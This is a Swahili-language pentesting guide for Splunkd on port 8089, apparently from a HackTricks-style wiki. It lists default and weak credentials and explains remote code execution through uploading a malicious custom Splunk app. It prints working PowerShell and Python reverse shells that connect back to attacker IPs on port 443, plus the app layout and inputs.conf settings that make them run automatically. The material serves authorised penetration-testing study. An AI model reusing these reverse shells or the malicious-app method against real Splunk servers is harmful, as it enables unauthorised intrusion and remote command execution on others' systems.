8089 - Pentesting Splunkd

Reading time: 4 minutes

Taarifa za Msingi

• Zana ya uchambuzi wa log inayotumika kwa ukusanyaji wa data, uchambuzi, na uonyeshaji
• Inatumika sana katika ufuatiliaji wa usalama na uchambuzi wa biashara
• Bandari za kawaida:
• Web server: 8000
• Huduma ya Splunkd: 8089

Njia za Uthibitishaji wa Uthibitisho:

1. Ukatili wa Toleo la Bure

• Toleo la majaribio linabadilishwa kiotomatiki kuwa toleo la bure baada ya siku 60
• Toleo la bure halina uthibitisho
• Hatari ya usalama ikiwa halitashughulikiwa
• Wasimamizi wanaweza kupuuzilia mbali athari za usalama

2. Udhaifu wa Akreditivu

• Toleo za zamani: Akreditivu za kawaida admin:changeme
• Toleo za kisasa: Akreditivu zinawekwa wakati wa usakinishaji
• Uwezekano wa matumizi ya nywila dhaifu (mfano, admin, Welcome, Password123)

3. Fursa za Utekelezaji wa Kanuni za Kijijini

• Njia nyingi za utekelezaji wa kanuni:
• Programu za Django upande wa seva
• Mipaka ya REST
• Ingizo la skripti
• Skripti za arifa
• Msaada wa majukwaa tofauti (Windows/Linux)
• Ingizo la skripti linaweza kukimbia:
• Skripti za Bash
• Skripti za PowerShell
• Skripti za Batch

Uwezekano wa Ukatili Muhimu:

• Hifadhi ya data nyeti
• Ukosefu wa uthibitisho katika toleo la bure
• Njia nyingi za uwezekano wa utekelezaji wa kanuni za kijijini
• Uwezekano wa kutumia ingizo la skripti kwa ajili ya kuathiri mfumo

Shodan

• Splunk build

RCE

Unda Programu Maalum

Splunk inatoa njia ya kisasa ya utekelezaji wa kanuni za kijijini kupitia usambazaji wa programu maalum, ikitumia uwezo wake wa skripti wa majukwaa tofauti. Mbinu ya msingi ya ukatili inahusisha kuunda programu mbaya inayoweza kutekeleza shell za kurudi kwenye mifumo ya Windows na Linux.

Programu maalum inaweza kukimbia Python, Batch, Bash, au PowerShell scripts. Zaidi ya hayo, Splunk inakuja na Python iliyosakinishwa, hivyo hata katika mifumo ya Windows utaweza kukimbia kanuni za python.

Unaweza kutumia hii mfano na bin inayojumuisha mfano wa Python na PowerShell. Au unaweza kuunda yako mwenyewe.

Mchakato wa ukatili unafuata mbinu thabiti katika majukwaa:

splunk_shell/
├── bin        (reverse shell scripts)
└── default    (inputs.conf configuration)

Faili muhimu la usanidi inputs.conf linawezesha skripti kwa:

• Kuweka disabled = 0
• Kuunda kipindi cha utekelezaji cha sekunde 10
• Kuelezea aina ya chanzo cha skripti

Kuweka ni rahisi:

1. Tengeneza kifurushi cha programu chenye madhara
2. Weka msikilizaji (Netcat/socat) kwenye mashine ya kushambulia
3. Pakia programu kupitia kiolesura cha Splunk
4. Washa utekelezaji wa skripti kiotomatiki baada ya kupakia

Mfano wa Windows PowerShell reverse shell:

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()

Sample Linux Python reverse shell:

import sys, socket, os, pty
ip = "10.10.14.15"
port = "443"
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')

RCE & Privilege Escalation

Katika ukurasa ufuatao unaweza kupata maelezo jinsi huduma hii inaweza kutumika vibaya ili kupandisha mamlaka na kupata kudumu:

{{#ref}} ../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md {{#endref}}

References

• https://academy.hackthebox.com/module/113/section/1213